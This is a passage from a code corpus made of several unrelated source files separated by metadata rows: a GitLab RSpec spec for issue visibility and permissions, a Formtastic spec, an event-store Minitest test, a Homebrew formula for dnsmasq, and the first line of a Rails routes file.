expect(Ability).to receive(:allowed?).with(user, :read_all_resources, :global).at_least(:once).and_call_original
expect(Ability).to receive(:allowed?).with(user, :read_cross_project).and_return(false)
expect(authorized_issue_a.related_issues(user))
.to contain_exactly(authorized_issue_b)
end
end
end
describe '#can_move?' do
let(:issue) { create(:issue) }
subject { issue.can_move?(user) }
context 'user is not a member of project issue belongs to' do
it { is_expected.to eq false}
end
context 'user is reporter in project issue belongs to' do
let(:issue) { create(:issue, project: reusable_project) }
before_all do
reusable_project.add_reporter(user)
end
it { is_expected.to eq true }
context 'issue not persisted' do
let(:issue) { build(:issue, project: reusable_project) }
it { is_expected.to eq false }
end
context 'checking destination project also' do
subject { issue.can_move?(user, to_project) }
let_it_be(:to_project) { create(:project) }
context 'destination project allowed' do
before do
to_project.add_reporter(user)
end
it { is_expected.to eq true }
end
context 'destination project not allowed' do
before do
to_project.add_guest(user)
end
it { is_expected.to eq false }
end
end
end
end
describe '#moved?' do
context 'when issue has not been moved' do
subject { build_stubbed(:issue) }
it { is_expected.not_to be_moved }
end
context 'when issue has already been moved' do
subject { build_stubbed(:issue, moved_to: build_stubbed(:issue)) }
it { is_expected.to be_moved }
end
end
describe '#duplicated?' do
let(:issue) { create(:issue, project: reusable_project) }
subject { issue.duplicated? }
context 'issue not duplicated' do
it { is_expected.to eq false }
end
context 'issue already duplicated' do
let(:duplicated_to_issue) { create(:issue, project: reusable_project) }
let(:issue) { create(:issue, duplicated_to: duplicated_to_issue) }
it { is_expected.to eq true }
end
end
describe '#from_service_desk?' do
subject { issue.from_service_desk? }
context 'when issue author is support bot' do
let(:issue) { create(:issue, project: reusable_project, author: ::User.support_bot) }
it { is_expected.to be_truthy }
end
context 'when issue author is not support bot' do
let(:issue) { create(:issue, project: reusable_project) }
it { is_expected.to be_falsey }
end
end
describe '#suggested_branch_name' do
let(:repository) { double }
subject { build(:issue) }
before do
allow(subject.project).to receive(:repository).and_return(repository)
end
describe '#to_branch_name does not exists' do
before do
allow(repository).to receive(:branch_exists?).and_return(false)
end
it 'returns #to_branch_name' do
expect(subject.suggested_branch_name).to eq(subject.to_branch_name)
end
end
describe '#to_branch_name exists not ending with -index' do
before do
allow(repository).to receive(:branch_exists?).and_return(true)
allow(repository).to receive(:branch_exists?).with(/#{subject.to_branch_name}-\d/).and_return(false)
end
it 'returns #to_branch_name ending with -2' do
expect(subject.suggested_branch_name).to eq("#{subject.to_branch_name}-2")
end
end
describe '#to_branch_name exists ending with -index' do
before do
allow(repository).to receive(:branch_exists?).and_return(true)
allow(repository).to receive(:branch_exists?).with("#{subject.to_branch_name}-3").and_return(false)
end
it 'returns #to_branch_name ending with max index + 1' do
expect(subject.suggested_branch_name).to eq("#{subject.to_branch_name}-3")
end
end
end
describe '#has_related_branch?' do
let(:issue) { create(:issue, project: reusable_project, title: "Blue Bell Knoll") }
subject { issue.has_related_branch? }
context 'branch found' do
before do
allow(issue.project.repository).to receive(:branch_names).and_return(["iceblink-luck", issue.to_branch_name])
end
it { is_expected.to eq true }
end
context 'branch not found' do
before do
allow(issue.project.repository).to receive(:branch_names).and_return(["lazy-calm"])
end
it { is_expected.to eq false }
end
end
it_behaves_like 'an editable mentionable' do
subject { create(:issue, project: create(:project, :repository)) }
let(:backref_text) { "issue #{subject.to_reference}" }
let(:set_mentionable_text) { ->(txt) { subject.description = txt } }
end
it_behaves_like 'a Taskable' do
let(:subject) { create :issue }
end
describe "#to_branch_name" do
let_it_be(:issue) { create(:issue, project: reusable_project, title: 'testing-issue') }
it 'starts with the issue iid' do
expect(issue.to_branch_name).to match(/\A#{issue.iid}-[A-Za-z\-]+\z/)
end
it "contains the issue title if not confidential" do
expect(issue.to_branch_name).to match(/testing-issue\z/)
end
it "does not contain the issue title if confidential" do
issue = create(:issue, project: reusable_project, title: 'testing-issue', confidential: true)
expect(issue.to_branch_name).to match(/confidential-issue\z/)
end
context 'issue title longer than 100 characters' do
let_it_be(:issue) { create(:issue, project: reusable_project, iid: 999, title: 'Lorem ipsum dolor sit amet consectetur adipiscing elit Mauris sit amet ipsum id lacus custom fringilla convallis') }
it "truncates branch name to at most 100 characters" do
expect(issue.to_branch_name.length).to be <= 100
end
it "truncates dangling parts of the branch name" do
# 100 characters would've got us "999-lorem...lacus-custom-fri".
expect(issue.to_branch_name).to eq("999-lorem-ipsum-dolor-sit-amet-consectetur-adipiscing-elit-mauris-sit-amet-ipsum-id-lacus-custom")
end
end
end
describe '#can_be_worked_on?' do
let(:project) { build(:project) }
subject { build(:issue, :opened, project: project) }
context 'is closed' do
subject { build(:issue, :closed) }
it { is_expected.not_to be_can_be_worked_on }
end
context 'project is forked' do
before do
allow(project).to receive(:forked?).and_return(true)
end
it { is_expected.not_to be_can_be_worked_on }
end
it { is_expected.to be_can_be_worked_on }
end
describe '#participants' do
context 'using a public project' do
let_it_be(:issue) { create(:issue, project: reusable_project) }
let!(:note1) do
create(:note_on_issue, noteable: issue, project: reusable_project, note: 'a')
end
let!(:note2) do
create(:note_on_issue, noteable: issue, project: reusable_project, note: 'b')
end
it 'includes the issue author' do
expect(issue.participants).to include(issue.author)
end
it 'includes the authors of the notes' do
expect(issue.participants).to include(note1.author, note2.author)
end
end
context 'using a private project' do
it 'does not include mentioned users that do not have access to the project' do
project = create(:project)
issue = create(:issue, project: project)
user = create(:user)
create(:note_on_issue,
noteable: issue,
project: project,
note: user.to_reference)
expect(issue.participants).not_to include(user)
end
end
end
describe 'cached counts' do
it 'updates when assignees change' do
user1 = create(:user)
user2 = create(:user)
issue = create(:issue, assignees: [user1], project: reusable_project)
reusable_project.add_developer(user1)
reusable_project.add_developer(user2)
expect(user1.assigned_open_issues_count).to eq(1)
expect(user2.assigned_open_issues_count).to eq(0)
issue.assignees = [user2]
issue.save!
expect(user1.assigned_open_issues_count).to eq(0)
expect(user2.assigned_open_issues_count).to eq(1)
end
end
describe '#visible_to_user?' do
let(:project) { reusable_project }
let(:issue) { build(:issue, project: project) }
subject { issue.visible_to_user?(user) }
context 'with a project' do
it 'returns false when feature is disabled' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::DISABLED)
is_expected.to eq(false)
end
it 'returns false when restricted for members' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::PRIVATE)
is_expected.to eq(false)
end
end
context 'without a user' do
let(:user) { nil }
before do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::PUBLIC)
end
it 'returns true when the issue is publicly visible' do
expect(issue).to receive(:publicly_visible?).and_return(true)
is_expected.to eq(true)
end
it 'returns false when the issue is not publicly visible' do
expect(issue).to receive(:publicly_visible?).and_return(false)
is_expected.to eq(false)
end
end
context 'with a user' do
shared_examples 'issue readable by user' do
it { is_expected.to eq(true) }
end
shared_examples 'issue not readable by user' do
it { is_expected.to eq(false) }
end
shared_examples 'confidential issue readable by user' do
specify do
issue.confidential = true
is_expected.to eq(true)
end
end
shared_examples 'confidential issue not readable by user' do
specify do
issue.confidential = true
is_expected.to eq(false)
end
end
context 'with an admin user' do
let(:user) { build(:admin) }
context 'when admin mode is enabled', :enable_admin_mode do
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'when admin mode is disabled' do
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
end
context 'with an owner' do
before do
project.add_maintainer(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'with a reporter user' do
before do
project.add_reporter(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'with a guest user' do
before do
project.add_guest(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
context 'when user is an assignee' do
before do
issue.update!(assignees: [user])
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'when user is the author' do
before do
issue.update!(author: user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
end
context 'with a user that is not a member' do
context 'using a public project' do
let(:project) { build(:project, :public) }
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'using an internal project' do
let(:project) { build(:project, :internal) }
context 'using an internal user' do
before do
allow(user).to receive(:external?).and_return(false)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'using an external user' do
before do
allow(user).to receive(:external?).and_return(true)
end
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
end
context 'using an external user' do
before do
allow(user).to receive(:external?).and_return(true)
end
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
end
context 'with an external authentication service' do
before do
enable_external_authorization_service_check
end
it 'is `false` when an external authorization service is enabled' do
issue = build(:issue, project: build(:project, :public))
expect(issue).not_to be_visible_to_user
end
it 'checks the external service to determine if an issue is readable by a user' do
project = build(:project, :public,
external_authorization_classification_label: 'a-label')
issue = build(:issue, project: project)
user = build(:user)
expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false }
expect(issue.visible_to_user?(user)).to be_falsy
end
it 'does not check the external service if a user does not have access to the project' do
project = build(:project, :private,
external_authorization_classification_label: 'a-label')
issue = build(:issue, project: project)
user = build(:user)
expect(::Gitlab::ExternalAuthorization).not_to receive(:access_allowed?)
expect(issue.visible_to_user?(user)).to be_falsy
end
context 'with an admin' do
context 'when admin mode is enabled', :enable_admin_mode do
it 'does not check the external webservice' do
issue = build(:issue)
user = build(:admin)
expect(::Gitlab::ExternalAuthorization).not_to receive(:access_allowed?)
issue.visible_to_user?(user)
end
end
context 'when admin mode is disabled' do
it 'checks the external service to determine if an issue is readable by the admin' do
project = build(:project, :public,
external_authorization_classification_label: 'a-label')
issue = build(:issue, project: project)
user = build(:admin)
expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false }
expect(issue.visible_to_user?(user)).to be_falsy
end
end
end
end
context 'when issue is moved to a private project' do
let(:private_project) { build(:project, :private)}
before do
issue.update!(project: private_project) # move issue to private project
end
shared_examples 'issue visible if user has guest access' do
context 'when user is not a member' do
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'when user is a guest' do
before do
private_project.add_guest(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
end
context 'when user is the author of the original issue' do
before do
issue.update!(author: user)
end
it_behaves_like 'issue visible if user has guest access'
end
context 'when user is an assignee in the original issue' do
before do
issue.update!(assignees: [user])
end
it_behaves_like 'issue visible if user has guest access'
end
context 'when user is not the author or an assignee in original issue' do
context 'when user is a guest' do
before do
private_project.add_guest(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'when user is a reporter' do
before do
private_project.add_reporter(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
end
end
end
end
describe '#publicly_visible?' do
context 'using a public project' do
let(:project) { create(:project, :public) }
it 'returns true for a regular issue' do
issue = build(:issue, project: project)
        expect(issue.publicly_visible?).to be_truthy
end
it 'returns false for a confidential issue' do
issue = build(:issue, :confidential, project: project)
        expect(issue.publicly_visible?).to be_falsey
end
end
context 'using an internal project' do
let(:project) { create(:project, :internal) }
it 'returns false for a regular issue' do
issue = build(:issue, project: project)
        expect(issue.publicly_visible?).to be_falsey
end
it 'returns false for a confidential issue' do
issue = build(:issue, :confidential, project: project)
        expect(issue.publicly_visible?).to be_falsey
end
end
context 'using a private project' do
let(:project) { create(:project, :private) }
it 'returns false for a regular issue' do
issue = build(:issue, project: project)
        expect(issue.publicly_visible?).to be_falsey
end
it 'returns false for a confidential issue' do
issue = build(:issue, :confidential, project: project)
        expect(issue.publicly_visible?).to be_falsey
end
end
end
describe '#hook_attrs' do
it 'delegates to Gitlab::HookData::IssueBuilder#build' do
builder = double
expect(Gitlab::HookData::IssueBuilder)
.to receive(:new).with(subject).and_return(builder)
expect(builder).to receive(:build)
subject.hook_attrs
end
end
describe '#check_for_spam?' do
using RSpec::Parameterized::TableSyntax
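    # Spam is only checked when the change could become publicly visible:
    # a public project, a non-confidential result, and a changed title/description/confidentiality.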
where(:visibility_level, :confidential, :new_attributes, :check_for_spam?) do
Gitlab::VisibilityLevel::PUBLIC | false | { description: 'woo' } | true
Gitlab::VisibilityLevel::PUBLIC | false | { title: 'woo' } | true
Gitlab::VisibilityLevel::PUBLIC | true | { confidential: false } | true
Gitlab::VisibilityLevel::PUBLIC | true | { description: 'woo' } | false
Gitlab::VisibilityLevel::PUBLIC | false | { title: 'woo', confidential: true } | false
Gitlab::VisibilityLevel::PUBLIC | false | { description: 'original description' } | false
Gitlab::VisibilityLevel::INTERNAL | false | { description: 'woo' } | false
Gitlab::VisibilityLevel::PRIVATE | false | { description: 'woo' } | false
end
with_them do
it 'checks for spam on issues that can be seen anonymously' do
project = reusable_project
project.update!(visibility_level: visibility_level)
issue = create(:issue, project: project, confidential: confidential, description: 'original description')
issue.assign_attributes(new_attributes)
expect(issue.check_for_spam?).to eq(check_for_spam?)
end
end
end
describe 'removing an issue' do
it 'refreshes the number of open issues of the project' do
project = subject.project
expect { subject.destroy! }
.to change { project.open_issues_count }.from(1).to(0)
end
end
describe '.public_only' do
it 'only returns public issues' do
public_issue = create(:issue, project: reusable_project)
create(:issue, project: reusable_project, confidential: true)
expect(described_class.public_only).to eq([public_issue])
end
end
describe '.confidential_only' do
it 'only returns confidential_only issues' do
create(:issue, project: reusable_project)
confidential_issue = create(:issue, project: reusable_project, confidential: true)
expect(described_class.confidential_only).to eq([confidential_issue])
end
end
describe '.by_project_id_and_iid' do
let_it_be(:issue_a) { create(:issue, project: reusable_project) }
let_it_be(:issue_b) { create(:issue, iid: issue_a.iid) }
let_it_be(:issue_c) { create(:issue, project: issue_a.project) }
let_it_be(:issue_d) { create(:issue, project: issue_a.project) }
it_behaves_like 'a where_composite scope', :by_project_id_and_iid do
let(:all_results) { [issue_a, issue_b, issue_c, issue_d] }
let(:first_result) { issue_a }
let(:composite_ids) do
all_results.map { |issue| { project_id: issue.project_id, iid: issue.iid } }
end
end
end
describe '.service_desk' do
it 'returns the service desk issue' do
service_desk_issue = create(:issue, project: reusable_project, author: ::User.support_bot)
regular_issue = create(:issue, project: reusable_project)
expect(described_class.service_desk).to include(service_desk_issue)
expect(described_class.service_desk).not_to include(regular_issue)
end
end
it_behaves_like 'throttled touch' do
subject { create(:issue, updated_at: 1.hour.ago) }
end
describe "#labels_hook_attrs" do
let(:label) { create(:label) }
let(:issue) { create(:labeled_issue, project: reusable_project, labels: [label]) }
it "returns a list of label hook attributes" do
expect(issue.labels_hook_attrs).to eq([label.hook_attrs])
end
end
context "relative positioning" do
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, group: group) }
let_it_be(:issue1) { create(:issue, project: project, relative_position: nil) }
let_it_be(:issue2) { create(:issue, project: project, relative_position: nil) }
it_behaves_like "a class that supports relative positioning" do
let_it_be(:project) { reusable_project }
let(:factory) { :issue }
let(:default_params) { { project: project } }
end
it 'is not blocked for repositioning by default' do
expect(issue1.blocked_for_repositioning?).to eq(false)
end
context 'when block_issue_repositioning flag is enabled for group' do
before do
stub_feature_flags(block_issue_repositioning: group)
end
it 'is blocked for repositioning' do
expect(issue1.blocked_for_repositioning?).to eq(true)
end
it 'does not move issues with null position' do
payload = [issue1, issue2]
expect { described_class.move_nulls_to_end(payload) }.to raise_error(Gitlab::RelativePositioning::IssuePositioningDisabled)
expect { described_class.move_nulls_to_start(payload) }.to raise_error(Gitlab::RelativePositioning::IssuePositioningDisabled)
end
end
end
it_behaves_like 'versioned description'
describe "#previous_updated_at" do
let_it_be(:updated_at) { Time.zone.local(2012, 01, 06) }
let_it_be(:issue) { create(:issue, project: reusable_project, updated_at: updated_at) }
it 'returns updated_at value if updated_at did not change at all' do
allow(issue).to receive(:previous_changes).and_return({})
expect(issue.previous_updated_at).to eq(updated_at)
end
it 'returns updated_at value if `previous_changes` has nil value for `updated_at`' do
allow(issue).to receive(:previous_changes).and_return({ 'updated_at' => nil })
expect(issue.previous_updated_at).to eq(updated_at)
end
it 'returns updated_at value if previous updated_at value is not present' do
allow(issue).to receive(:previous_changes).and_return({ 'updated_at' => [nil, Time.zone.local(2013, 02, 06)] })
expect(issue.previous_updated_at).to eq(updated_at)
end
it 'returns previous updated_at when present' do
allow(issue).to receive(:previous_changes).and_return({ 'updated_at' => [Time.zone.local(2013, 02, 06), Time.zone.local(2013, 03, 06)] })
expect(issue.previous_updated_at).to eq(Time.zone.local(2013, 02, 06))
end
end
describe '#design_collection' do
it 'returns a design collection' do
issue = build(:issue)
collection = issue.design_collection
expect(collection).to be_a(DesignManagement::DesignCollection)
expect(collection.issue).to eq(issue)
end
end
describe 'current designs' do
let(:issue) { create(:issue, project: reusable_project) }
subject { issue.designs.current }
context 'an issue has no designs' do
it { is_expected.to be_empty }
end
context 'an issue only has current designs' do
let!(:design_a) { create(:design, :with_file, issue: issue) }
let!(:design_b) { create(:design, :with_file, issue: issue) }
let!(:design_c) { create(:design, :with_file, issue: issue) }
it { is_expected.to include(design_a, design_b, design_c) }
end
context 'an issue only has deleted designs' do
let!(:design_a) { create(:design, :with_file, issue: issue, deleted: true) }
let!(:design_b) { create(:design, :with_file, issue: issue, deleted: true) }
let!(:design_c) { create(:design, :with_file, issue: issue, deleted: true) }
it { is_expected.to be_empty }
end
context 'an issue has a mixture of current and deleted designs' do
let!(:design_a) { create(:design, :with_file, issue: issue) }
let!(:design_b) { create(:design, :with_file, issue: issue, deleted: true) }
let!(:design_c) { create(:design, :with_file, issue: issue) }
it { is_expected.to contain_exactly(design_a, design_c) }
end
end
describe '.with_label_attributes' do
subject { described_class.with_label_attributes(label_attributes) }
let(:label_attributes) { { title: 'hello world', description: 'hi' } }
it 'gets issues with given label attributes' do
label = create(:label, **label_attributes)
labeled_issue = create(:labeled_issue, project: label.project, labels: [label])
expect(subject).to include(labeled_issue)
end
it 'excludes issues without given label attributes' do
label = create(:label, title: 'GitLab', description: 'tanuki')
labeled_issue = create(:labeled_issue, project: label.project, labels: [label])
expect(subject).not_to include(labeled_issue)
end
end
describe 'banzai_render_context' do
let(:project) { build(:project_empty_repo) }
let(:issue) { build :issue, project: project }
subject(:context) { issue.banzai_render_context(:title) }
it 'sets the label_url_method in the context' do
expect(context[:label_url_method]).to eq(:project_issues_url)
end
end
describe 'scheduling rebalancing' do
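    # Stub the positioning mover to raise a statement timeout so the model falls back
    # to scheduling an asynchronous rebalance via IssueRebalancingWorker.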
before do
allow_next_instance_of(RelativePositioning::Mover) do |mover|
allow(mover).to receive(:move) { raise ActiveRecord::QueryCanceled }
end
end
shared_examples 'schedules issues rebalancing' do
let(:issue) { build_stubbed(:issue, relative_position: 100, project: project) }
it 'schedules rebalancing if we time-out when moving' do
lhs = build_stubbed(:issue, relative_position: 99, project: project)
to_move = build(:issue, project: project)
expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, project_id, namespace_id)
expect { to_move.move_between(lhs, issue) }.to raise_error(ActiveRecord::QueryCanceled)
end
end
context 'when project in user namespace' do
let(:project) { build_stubbed(:project_empty_repo) }
let(:project_id) { project.id }
let(:namespace_id) { nil }
it_behaves_like 'schedules issues rebalancing'
end
context 'when project in a group namespace' do
let(:group) { create(:group) }
let(:project) { build_stubbed(:project_empty_repo, group: group) }
let(:project_id) { nil }
let(:namespace_id) { group.id }
it_behaves_like 'schedules issues rebalancing'
end
end
describe '#allows_reviewers?' do
it 'returns false as we do not support reviewers on issues yet' do
issue = build_stubbed(:issue)
expect(issue.allows_reviewers?).to be(false)
end
end
describe '#issue_type_supports?' do
let_it_be(:issue) { create(:issue) }
it 'raises error when feature is invalid' do
      expect { issue.issue_type_supports?(:unknown_feature) }.to raise_error(ArgumentError)
end
end
describe '#supports_time_tracking?' do
let_it_be(:project) { create(:project) }
let_it_be_with_refind(:issue) { create(:incident, project: project) }
where(:issue_type, :supports_time_tracking) do
:issue | true
:incident | true
end
with_them do
before do
issue.update!(issue_type: issue_type)
end
it do
expect(issue.supports_time_tracking?).to eq(supports_time_tracking)
end
end
end
describe '#email_participants_emails' do
let_it_be(:issue) { create(:issue) }
it 'returns a list of emails' do
participant1 = issue.issue_email_participants.create!(email: '[email protected]')
participant2 = issue.issue_email_participants.create!(email: '[email protected]')
expect(issue.email_participants_emails).to contain_exactly(participant1.email, participant2.email)
end
end
  describe '#email_participants_emails_downcase' do
it 'returns a list of emails with all uppercase letters replaced with their lowercase counterparts' do
participant = create(:issue_email_participant, email: '[email protected]')
expect(participant.issue.email_participants_emails_downcase).to match([participant.email.downcase])
end
end
end
| 33 | 202 | 0.664576 |
bb678b40adeca630c58427998f95547fd477c474 | 5,267 | # encoding: utf-8
require 'spec_helper'
describe 'Formtastic::FormBuilder#fields_for' do
include FormtasticSpecHelper
before do
@output_buffer = ''
mock_everything
@new_post.stub(:author).and_return(::Author.new)
end
context 'outside a form_for block' do
it 'yields an instance of FormHelper.builder' do
semantic_fields_for(@new_post) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
semantic_fields_for(@new_post.author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
semantic_fields_for(:author, @new_post.author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
semantic_fields_for(:author, @hash_backed_author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
end
it 'should respond to input' do
semantic_fields_for(@new_post) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
semantic_fields_for(@new_post.author) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
semantic_fields_for(:author, @new_post.author) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
semantic_fields_for(:author, @hash_backed_author) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
end
end
context 'within a form_for block' do
it 'yields an instance of FormHelper.builder' do
semantic_form_for(@new_post) do |builder|
builder.semantic_fields_for(:author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
end
end
it 'yields an instance of FormHelper.builder with hash-like model' do
semantic_form_for(:user) do |builder|
builder.semantic_fields_for(:author, @hash_backed_author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
end
end
it 'nests the object name' do
semantic_form_for(@new_post) do |builder|
builder.semantic_fields_for(@bob) do |nested_builder|
nested_builder.object_name.should == 'post[author]'
end
end
end
it 'supports passing collection as second parameter' do
semantic_form_for(@new_post) do |builder|
builder.semantic_fields_for(:author, [@fred,@bob]) do |nested_builder|
nested_builder.object_name.should =~ /post\[author_attributes\]\[\d+\]/
end
end
end
it 'should sanitize html id for li tag' do
@bob.stub(:column_for_attribute).and_return(double('column', :type => :string, :limit => 255))
concat(semantic_form_for(@new_post) do |builder|
concat(builder.semantic_fields_for(@bob, :index => 1) do |nested_builder|
concat(nested_builder.inputs(:login))
end)
end)
output_buffer.should have_tag('form fieldset.inputs #post_author_1_login_input')
# Not valid selector, so using good ol' regex
output_buffer.should_not =~ /id="post\[author\]_1_login_input"/
# <=> output_buffer.should_not have_tag('form fieldset.inputs #post[author]_1_login_input')
end
it 'should use namespace provided in nested fields' do
@bob.stub(:column_for_attribute).and_return(double('column', :type => :string, :limit => 255))
concat(semantic_form_for(@new_post, :namespace => 'context2') do |builder|
concat(builder.semantic_fields_for(@bob, :index => 1) do |nested_builder|
concat(nested_builder.inputs(:login))
end)
end)
output_buffer.should have_tag('form fieldset.inputs #context2_post_author_1_login_input')
end
it 'should render errors on the nested inputs' do
@errors = double('errors')
@errors.stub(:[]).with(errors_matcher(:login)).and_return(['oh noes'])
@bob.stub(:errors).and_return(@errors)
concat(semantic_form_for(@new_post, :namespace => 'context2') do |builder|
concat(builder.semantic_fields_for(@bob) do |nested_builder|
concat(nested_builder.inputs(:login))
end)
end)
output_buffer.should =~ /oh noes/
end
end
context "when I rendered my own hidden id input" do
before do
output_buffer.replace ''
@fred.posts.size.should == 1
@fred.posts.first.stub(:persisted?).and_return(true)
@fred.stub(:posts_attributes=)
concat(semantic_form_for(@fred) do |builder|
concat(builder.semantic_fields_for(:posts) do |nested_builder|
concat(nested_builder.input(:id, :as => :hidden))
concat(nested_builder.input(:title))
end)
end)
end
it "should only render one hidden input (my one)" do
output_buffer.should have_tag 'input#author_posts_attributes_0_id', :count => 1
end
it "should render the hidden input inside an li.hidden" do
output_buffer.should have_tag 'li.hidden input#author_posts_attributes_0_id'
end
end
end
| 36.832168 | 100 | 0.677046 |
3327bcdbedf7ce6c43b06e40660247fddf8707db | 1,334 | require 'test_helper'
require 'simple_cqrs/events'
require 'uba/event_store/memory_store'
module Uba
module EventStore
class MemoryStoreTest < Minitest::Test
def test_save
store = MemoryStore.new
event = InventoryItemCreated.coerce! id: SecureRandom.uuid,
name: Faker::RickAndMorty.character
store.save_event(event)
end
def test_load_events_for_aggregate
store = MemoryStore.new
aggregate_id = SecureRandom.uuid
create_event = InventoryItemCreated.coerce! id: aggregate_id,
name: Faker::RickAndMorty.character
rename_event = InventoryItemRenamed.coerce! id: aggregate_id,
new_name: Faker::RickAndMorty.character
noise_event = InventoryItemCreated.coerce! id: SecureRandom.uuid,
name: Faker::RickAndMorty.character
store.save_event create_event
store.save_event noise_event
store.save_event rename_event
assert_equal([create_event, rename_event],
store.load_events_for_aggregate(aggregate_id),
'return only event with given aggregate_id')
end
end
end
end
| 35.105263 | 91 | 0.602699 |
013bb5429de9b6058d795d79094a65bca44db790 | 3,962 | class Dnsmasq < Formula
desc "Lightweight DNS forwarder and DHCP server"
homepage "http://www.thekelleys.org.uk/dnsmasq/doc.html"
url "http://www.thekelleys.org.uk/dnsmasq/dnsmasq-2.78.tar.gz"
sha256 "c92e5d78aa6353354d02aabf74590d08980bb1385d8a00b80ef9bc80430aa1dc"
bottle do
rebuild 1
sha256 "29b9a8f0b872785a893a2446098ea979a4172938aac84d4dcbc42e55ffb15e73" => :high_sierra
sha256 "8ec8cbc805daeeba93b450ec5c5fea02cdcc7978cf93a4e8032bb836c83c5f03" => :sierra
sha256 "84a562c8c0ff1a83cabfaa0bf50c9a05169715ce879c4308efbc132e66302120" => :el_capitan
sha256 "3d993c53ef42b234a8f9c6f51bc67bf263f7fcedf2ba4637ccc39d6115769d4e" => :x86_64_linux
end
option "with-libidn", "Compile with IDN support"
option "with-dnssec", "Compile with DNSSEC support"
deprecated_option "with-idn" => "with-libidn"
depends_on "pkg-config" => :build
depends_on "libidn" => :optional
depends_on "gettext" if build.with? "libidn"
depends_on "nettle" if build.with? "dnssec"
def install
ENV.deparallelize
# Fix etc location
    inreplace %w[dnsmasq.conf.example src/config.h man/dnsmasq.8
                 man/es/dnsmasq.8 man/fr/dnsmasq.8] do |s|
s.gsub! "/var/lib/misc/dnsmasq.leases",
var/"lib/misc/dnsmasq/dnsmasq.leases", false
s.gsub! "/etc/dnsmasq.conf", etc/"dnsmasq.conf", false
s.gsub! "/var/run/dnsmasq.pid", var/"run/dnsmasq/dnsmasq.pid", false
s.gsub! "/etc/dnsmasq.d", etc/"dnsmasq.d", false
s.gsub! "/etc/ppp/resolv.conf", etc/"dnsmasq.d/ppp/resolv.conf", false
s.gsub! "/etc/dhcpc/resolv.conf", etc/"dnsmasq.d/dhcpc/resolv.conf", false
s.gsub! "/usr/sbin/dnsmasq", HOMEBREW_PREFIX/"sbin/dnsmasq", false
end
# Optional IDN support
if build.with? "libidn"
inreplace "src/config.h", "/* #define HAVE_IDN */", "#define HAVE_IDN"
ENV.append_to_cflags "-I#{Formula["gettext"].opt_include}"
ENV.append "LDFLAGS", "-L#{Formula["gettext"].opt_lib} -lintl"
end
# Optional DNSSEC support
if build.with? "dnssec"
inreplace "src/config.h", "/* #define HAVE_DNSSEC */", "#define HAVE_DNSSEC"
inreplace "dnsmasq.conf.example" do |s|
s.gsub! "#conf-file=%%PREFIX%%/share/dnsmasq/trust-anchors.conf",
"conf-file=#{opt_pkgshare}/trust-anchors.conf"
s.gsub! "#dnssec", "dnssec"
end
end
# Fix compilation on Lion
ENV.append_to_cflags "-D__APPLE_USE_RFC_3542" if MacOS.version >= :lion
inreplace "Makefile" do |s|
s.change_make_var! "CFLAGS", ENV.cflags
s.change_make_var! "LDFLAGS", ENV.ldflags
end
if build.with? "libidn"
system "make", "install-i18n", "PREFIX=#{prefix}"
else
system "make", "install", "PREFIX=#{prefix}"
end
pkgshare.install "trust-anchors.conf" if build.with? "dnssec"
etc.install "dnsmasq.conf.example" => "dnsmasq.conf"
end
def post_install
(var/"lib/misc/dnsmasq").mkpath
(var/"run/dnsmasq").mkpath
(etc/"dnsmasq.d/ppp").mkpath
(etc/"dnsmasq.d/dhcpc").mkpath
end
def caveats; <<~EOS
To configure dnsmasq, take the default example configuration at
#{etc}/dnsmasq.conf and edit to taste.
EOS
end
plist_options :startup => true
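  # launchd job definition (used by brew services) that keeps dnsmasq running in the foreground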
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/dnsmasq</string>
<string>--keep-in-foreground</string>
<string>-C</string>
<string>#{etc}/dnsmasq.conf</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
EOS
end
test do
system "#{sbin}/dnsmasq", "--test"
end
end
| 33.863248 | 115 | 0.65371 |
1ad978d521fd17aeb35a65a492d5e7aa4013fe38 | 850 | # frozen_string_literal: true
Rails.application.routes.draw do
